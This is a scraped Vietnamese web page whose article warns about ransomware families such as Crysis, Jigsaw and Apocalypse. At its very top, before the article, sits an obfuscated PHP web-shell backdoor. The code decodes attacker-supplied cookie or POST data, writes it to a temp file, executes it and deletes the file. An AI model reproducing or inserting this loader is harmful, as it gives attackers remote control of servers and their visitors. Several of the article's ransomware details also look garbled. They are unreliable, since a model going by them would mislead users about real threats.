$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Virus tống tiền trên máy tính đáng sợ nhất hiện nay - Tải Chùa

Virus tống tiền trên máy tính đáng sợ nhất hiện nay

Rate this post
“ Virus tồng tiền” rất lạ đúng không ? Nhưng không phải không có, loại vius này cực kỳ nguy hiểm nếu gặp phải chắc chắn bạn sẽ cảm thấy vô cùng sợ hãi vì máy tính của bạn không còn là của bạn nữa

“ Virus tồng tiền” rất lạ đúng không ? Nhưng không phải không có, loại vius này cực kỳ nguy hiểm nếu gặp phải chắc chắn bạn sẽ cảm thấy vô cùng sợ hãi vì máy tính của bạn không còn là của bạn nữa, nó mất hết khiển soát và gần như máy tính ma phục vụ các nhu cầu không tốt của kẻ xấu. Cùng taichua.com tìm hiểu để không gặp gặp phải những virus, mã độc tống tiền này nhé.

các loại virus tống tiền

  • Crysis

Đứng đầu top virus này phải kể đến đó là Crysis, đây là một dạng virus vô cùng nguy hiểm và đối tượng của nó là những các nhân và các doanh nghiệp. Loại virus này lân lan chủ yếu qua các file đính kèm dưới dạng winrar, 7-zip ,…khi gửi email.

Thủ đoạn tấn công: Sau khi đã xâm nhập vào máy tính của bạn,  đầu tiên Crysis sẽ tiến hành mã hóa gần 200 tệp tin trên ổ đĩa , sau đó đòi tiền chuộc bằng tiền ảo (bitcoin) tối đa lên đến 1022 bitcoin.

Nghiệm trọng hơn , Crysis còn có thể lây lan từ máy này sang máy khác bằng cách đánh cắp đặc quyền quản trị viên và tự động phát tán và lây nhiễm cho nhiều máy tính khác trong cùng một hệ thống mạng.

  • Jigsaw

Jigsaw là một loại virus khó lường bởi khả năng thay đổi cách thức tấn công người dùng. Jigsaw hay ẩn náy dưới dạng một trang web chat thông thường , để lừa “con mồi” của mình sập bẫy, nó còn kết hợp với voice chat để tạo các áp lực lên người bị tấn công.

Virus tồng tiền Jigsaw

Mã độc tống tiền này còn nguy hiểm hơn với khả năng sao chép và gửi những thông tin cá nhân cùng lịch sử email của nạn nhân đến toàn bộ liên lạc của họ để đòi tiền chuộc một cách dễ dàng hơn.

  • Apocalypse

Virus tống tiền Apocalypse đặc biệt nguy hiểm ở chỗ nó sẽ hướng dẫn tận tình người dùng phương pháp lấy lại dữ liệu thông qua email. Tuy vậy đó chỉ là thủ thuật ngụy trang nhằm đánh lạc hướng người dùng. Khi người sử dụng đăng nhập vào hệ thống, Apocalypse sẽ gửi một thông báo  rằng, nếu trong vòng 72h, người dùng không chuộc lại dữ liệu đã bị đánh cắp, toàn bộ dữ liệu trên máy tính sẽ bị hủy.

Nguy hiểm hơn, Apocalypse còn vô cùng thông minh khi có khả năng phát hiện nếu nạn nhân phát hiện, chạy file giải mã hay sử dụng mọi phương pháp để lấy lại quyền truy cập những tệp tin bị khóa.